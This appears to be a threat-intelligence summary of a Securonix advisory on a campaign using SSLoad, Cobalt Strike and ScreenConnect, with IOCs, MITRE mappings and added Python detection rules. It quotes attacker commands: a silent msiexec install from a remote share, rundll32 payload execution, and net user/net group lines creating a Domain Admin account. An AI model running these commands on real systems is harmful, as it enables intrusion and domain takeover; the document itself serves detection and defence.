Securonix Threat Research Security Advisory: Analysis of Ongoing FROZEN#SHADOW Attack Campaign Leveraging SSLoad Malware and RMM Software for Domain Takeover

Keypoints

  • Initial infection via phishing link that redirects from mmtixmm[.]org to a heavily commented JavaScript (out_czlrh.js) that launches further stages.
  • JavaScript uses ActiveX, WMI, and drive-mapping logic to access a remote share and silently install an MSI (slack.msi) via msiexec.
  • The MSI installs SSLoad components (DLLs in %APPDATA% and C:\ProgramData) that are executed through rundll32; the implant then beacons to HTTPS C2s and performs system/domain enumeration.
  • Operators manually deploy a Cobalt Strike beacon which downloads and installs ScreenConnect (ConnectWise Control) RMM to maintain persistent interactive access.
  • Attackers used PowerView PowerShell modules to enumerate shares and file servers, scraped browser-stored credentials and dumped LSASS to obtain a domain admin NTLM hash.
  • With elevated credentials they created a service-like domain account (svc_mail) and added it to Domain Admins, achieving full domain takeover and persistence.
  • Securonix recommends enhanced endpoint logging (Sysmon/PowerShell) and monitoring of staging directories like C:\ProgramData and %APPDATA% for detection.

MITRE Techniques

  • [T1059.007] Command and Scripting Interpreter: JavaScript – Initial execution used an obfuscated JavaScript file to start the chain (‘kicks off the code execution’).
  • [T1047] Windows Management Instrumentation – Script accessed WMI for command execution and system interaction (‘GetObject(“winmgmts:\\.\root\cimv2”)’).
  • [T1218.007] System Binary Proxy Execution: Msiexec – Installer was executed silently to install slack.msi (‘msiexec.exe /i wireoneinternet[.][email protected] /qn’).
  • [T1218.011] System Binary Proxy Execution: Rundll32 – SSLoad DLLs were executed via rundll32 to run malicious payloads (‘rundll32.exe “C:\Users\appdata\Roaming\Custom_update\Update_4319e68c.dll”, homi’).
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP/S) – Malware beaconed and sent collected data to HTTPS C2 endpoints (‘beaconing to two preconfigured C2 servers: hxxps://skinnyjeanso[.]com/live/ and hxxps://titnovacrion[.]top/live/’).
  • [T1102] Web Service – Initial phishing redirect delivered a JavaScript payload via web links (‘phishing emails contain a single link which redirects from a mmtixmm[.]org URL to a single JavaScript file’).
  • [T1219] Remote Access Software – Attackers installed ScreenConnect RMM to maintain interactive remote control (‘downloaded and installed a ScreenConnect RMM software instance’).
  • [T1003.001] OS Credential Dumping: LSASS Memory – Credentials were extracted from LSASS to obtain a domain admin NTLM hash (‘extract credentials from LSASS, where they were able to obtain a domain admin account NTLM hash’).
  • [T1069.002] Permission Groups Discovery: Domain Groups – Enumeration included querying domain groups and domain admins (‘net group “domain admins” /domain’).
  • [T1078.002] Valid Accounts: Domain Accounts – Attackers created and used a domain service account and added it to Domain Admins (‘net user svc_mail pass1234@ /add /domain’ and ‘net group “domain admins” svc_mail /add /domain’).

Indicators of Compromise

  • [Domain] C2 and staging domains – skinnyjeanso[.]com, wireoneinternet[.]info, and other domains used for payload hosting and C2.
  • [IP Address] Cobalt Strike C2 IPs – 85.239.54[.]190, 23.159.160[.]88 (used as HTTPS connect URLs for Cobalt Strike traffic).
  • [File name] Dropped installers/launchers – slack.msi, msedgeview.msi (MSI installers fetched and executed via msiexec).
  • [File name / DLL] Payload DLLs and staging paths – %APPDATA%\local\digistamp\mbae-api-na.dll, %APPDATA%\Custom_update\Update_*.dll (executed via rundll32).
  • [Hashes] Sample file hashes – out_czlrh.js (DB265EA1732935F61E8D0F7A20A8ADC54E20AF71B3CF4A737714CD3377C838F6), slack.msi (B9DBE9649C761B0EEE38419AC39DCD7E90486EE34CD0EB56ADDE6B2F645F2960), and 30+ other hashes listed in the report.

The technical procedure begins with a phishing-delivered redirect to a large, comment-filled JavaScript (out_czlrh.js) that, once cleaned, creates ActiveX and WMI objects to enumerate drives and attempt network share mapping to \\wireoneinternet[.]info@80\share. If a share is mapped, the script silently runs an MSI via msiexec (e.g., slack.msi) to drop subsequent stages; if mapping fails, it falls back to WMI-executed “net use” commands. The JavaScript’s primary purpose is reliable staging and silent installer execution. Its heavy comment noise serves as an evasion technique: it lowered the file’s apparent entropy and hid the 20 KB of meaningful code within an 835 KB file.
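The comment-padding trick described above defeats a naive byte-entropy check, so a useful triage measure is the share of a script that is comments. The following added example (not code from the Securonix report) strips `//` and `/* */` comments from JavaScript while leaving string literals intact, so a URL such as `http://...` inside quotes is not mistaken for a comment, and reports the comment ratio; the sample script and the 0.8 threshold are constructed for illustration.

```python
def strip_js_comments(src: str) -> str:
    """Remove // and /* */ comments; string literals (which may hold '//') survive.
    Regex literals are not handled, which is acceptable for a triage heuristic."""
    out, i, n, quote = [], 0, len(src), None
    while i < n:
        c = src[i]
        if quote:                                  # inside a string literal
            out.append(c)
            if c == "\\" and i + 1 < n:            # keep escaped char verbatim
                out.append(src[i + 1])
                i += 1
            elif c == quote:
                quote = None
            i += 1
        elif c in "'\"`":                          # string literal starts
            quote = c
            out.append(c)
            i += 1
        elif src.startswith("//", i):              # line comment: drop to newline
            j = src.find("\n", i)
            i = n if j == -1 else j                # newline itself is kept
        elif src.startswith("/*", i):              # block comment: drop to */
            j = src.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def comment_ratio(src: str) -> float:
    """Fraction of the file's bytes that are comment text (0.0 for an empty file)."""
    return (1.0 - len(strip_js_comments(src)) / len(src)) if src else 0.0


def is_comment_padded(src: str, threshold: float = 0.8) -> bool:
    """Flag scripts whose bulk is comments; threshold is a constructed tuning value."""
    return comment_ratio(src) > threshold


# Constructed sample: fifty filler comment lines around a few real statements.
SAMPLE_JS = (
    "// filler comment line\n" * 50
    + "var u = 'http://example.invalid/path'; // trailing note\n"
    + "/* block\n padding */ var sh = new ActiveXObject('WScript.Shell');\n"
)

if __name__ == "__main__":
    print(f"comment ratio {comment_ratio(SAMPLE_JS):.2f}, padded={is_comment_padded(SAMPLE_JS)}")
```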

Executed MSI payloads install SSLoad components (DLLs placed in %APPDATA% and C:\ProgramData) which are launched via rundll32, after which the implant beacons to HTTPS C2 servers (e.g., skinnyjeanso[.]com, titnovacrion[.]top). The malware runs extensive discovery (ipconfig/systeminfo/nltest/net/wmic/whoami), exfiltrates collected host and domain data over encrypted channels, and provides operator access. Operators then manually deploy a Cobalt Strike beacon (also executed via rundll32), which communicates over port 443 to configured C2 endpoints and is used to download and silently install a ScreenConnect RMM MSI to provide persistent, interactive remote control.

With RMM in place, the intruders ran PowerView modules (Invoke-ShareFinder, Find-DomainShare, Get-DomainFileServer) via a local proxy PowerShell endpoint to enumerate network shares and servers, scraped browser-stored credentials, and used LSASS credential dumping to obtain an NTLM hash for a domain admin. They then added a service-styled account (svc_mail) and promoted it to Domain Admins (net user / net group commands), achieving full domain persistence and lateral control. Monitoring recommendations include process-level logging (Sysmon/PowerShell), watching staging directories (C:\ProgramData, %APPDATA%), and network indicators for the listed domains and IPs.
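The process-level logging recommended above only pays off if someone turns the chain's command lines into rules. As an added example (not code from the report), the following Python runs a handful of command-line rules over constructed Sysmon-style process-creation records covering the stages summarised here: silent msiexec from a remote share, rundll32 loading a DLL from %APPDATA% or C:\ProgramData, PowerView share enumeration, and the net user / net group account creation. The sample records, the "user" profile name and the C:\ProgramData\example path are constructed; only the file names and commands quoted on the page are taken from the report.

```python
import re

# Command-line rules for the stages described in the advisory (constructed rules).
RULES = [
    ("silent msiexec install from remote share",
     re.compile(r"msiexec(\.exe)?\s+.*?/i\s+\\\\\S+.*?/qn", re.I)),
    ("rundll32 loading DLL from AppData/ProgramData staging dir",
     re.compile(r"rundll32(\.exe)?\s+\"?[^\"]*\\(AppData\\Roaming|ProgramData)\\[^\"]*\.dll", re.I)),
    ("PowerView share/file-server enumeration",
     re.compile(r"Invoke-ShareFinder|Find-DomainShare|Get-DomainFileServer", re.I)),
    ("domain account created via net user",
     re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\s+/domain", re.I)),
    ("account added to Domain Admins via net group",
     re.compile(r"\bnet1?\s+group\s+\"?domain admins\"?\s+\S+\s+/add", re.I)),
]

# Constructed Sysmon Event ID 1-style records: five malicious, three benign look-alikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i \\wireoneinternet[.]info@80\share\slack.msi /qn"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_4319e68c.dll", homi'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -c "Invoke-ShareFinder -CheckShareAccess"'},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net user svc_mail pass1234@ /add /domain"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r'net group "domain admins" svc_mail /add /domain'},
    # Benign: local installer, a system DLL, and group enumeration without /add.
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\installers\tool.msi /qn"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r'net group "domain admins" /domain'},
]


def triage(events):
    """Return (rule_name, command_line) for every record that matches a rule."""
    hits = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        hits.extend((name, cmd) for name, rx in RULES if rx.search(cmd))
    return hits


if __name__ == "__main__":
    for name, cmd in triage(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

The enumeration-only `net group "domain admins" /domain` is deliberately left unflagged by the last rule; pair it with a separate discovery rule if that noise is acceptable in your environment.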

Read more: https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/